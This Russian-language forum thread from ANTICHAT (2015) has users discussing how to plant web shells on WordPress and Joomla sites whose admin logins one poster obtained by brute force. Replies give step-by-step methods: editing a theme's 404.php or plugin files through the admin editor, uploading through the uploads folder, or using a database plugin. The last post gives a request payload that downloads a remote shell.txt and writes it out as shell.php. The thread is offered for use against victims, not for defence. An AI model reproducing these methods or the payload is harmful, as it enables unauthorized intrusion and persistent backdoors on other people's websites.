ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.07.2015, 11:13
|
|
Новичок
Регистрация: 31.01.2013
Сообщений: 16
Провел на форуме:
5873
Репутация:
0
|
|
Накопилось достаточно много доступов в админки вордпресс,джумлу с брута.В большинство не получается залиться.Думаю не хватает прав на запись.Если я дам несколько доступов,может кто-нибудь посмотрет,возможно ли туда залиться в принципе или можно забить на это дело?
|
|
|
16.07.2015, 11:31
|
|
Участник форума
Регистрация: 07.09.2013
Сообщений: 173
Провел на форуме:
62329
Репутация:
19
|
|
Закинь один из WP в личку, гляну.
С плагинами есть хитрость - можно менять исходник, но иногда сохранение дропается, т.к. количество строк шела значительно превышает размер кода плагина.
В таком случае, надо выбрать самый объемный или установить что-то.
|
|
|
|
16.07.2015, 12:17
|
|
Познающий
Регистрация: 29.03.2012
Сообщений: 77
Провел на форуме:
14367
Репутация:
0
|
|
Как варик побовать пролить шелл ли в тему ил в плагины, или же произвести установку, + пробовать залить как медиа в папку аплоадс, которая почти всегда открыта для записи.
Другой вариант попробовать взять аплоадер уже написаний и пролить.
|
|
|
|
16.07.2015, 15:34
|
|
Участник форума
Регистрация: 07.09.2013
Сообщений: 173
Провел на форуме:
62329
Репутация:
19
|
|
По WordPress вопрос в личке закрыли, что касается jooml'ы вопрос открыт.
Я ее не трогаю - брезгываю.
|
|
|
|
16.07.2015, 17:06
|
|
Познающий
Регистрация: 26.03.2011
Сообщений: 81
Провел на форуме:
24770
Репутация:
2
|
|
Если стоит плагин для управления бд сайта можно через mysql попробовать залить.
|
|
|
|
16.07.2015, 22:37
|
|
Новичок
Регистрация: 31.01.2013
Сообщений: 16
Провел на форуме:
5873
Репутация:
0
|
|
Да,с джумлай пока непонятки...
|
|
|
|
16.07.2015, 23:52
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
Провел на форуме:
98300
Репутация:
31
|
|
Странно, а что сложного в заливке шелла на WP? Берешь заходишь в -> Внешний Вид -> Редактор -> 404.php и туда пихаешь код шелла, заливаешься в нужное место, а потом код 404 страницы ставишь на место.
(На будущее)
|
|
|
|
17.07.2015, 11:29
|
|
Новичок
Регистрация: 31.01.2013
Сообщений: 16
Провел на форуме:
5873
Репутация:
0
|
|
приму к сведению
|
|
|
|
18.07.2015, 22:36
|
|
Новичок
Регистрация: 31.01.2013
Сообщений: 16
Провел на форуме:
5873
Репутация:
0
|
|
не получается организовать бэкдор таким способом:
в темах или другом месте в файл .php вставляю
по идеи должен в этой директории появится файл-шелл sys.php ,но ни хрена не выходит.Подскажите ,как сделать бзкдор
|
|
|
|
18.07.2015, 23:00
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
Провел на форуме:
98300
Репутация:
31
|
|
Сообщение от Demchik
↑
не получается организовать бэкдор таким способом:
в темах или другом месте в файл .php вставляю
по идеи должен в этой директории появится файл-шелл sys.php ,но ни хрена не выходит.Подскажите ,как сделать бзкдор
Вставляешь в нужный тебе PHP-шник выполнение кода:
Далее:
Код:
site.ru/example.php?cmd=$url = "http://site.ru/shell.txt";$content = file_get_contents($url);$h = fopen("shell.php","w");$text = "$content";fwrite($h,$text);fclose($h);
И все, шелл залит. Много раз этой вещью пользовался. А вообще тебе бы не мешало погуглить, или хотя бы поискать инфу на форуме. То что тебе нужно, уже давным давно есть.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
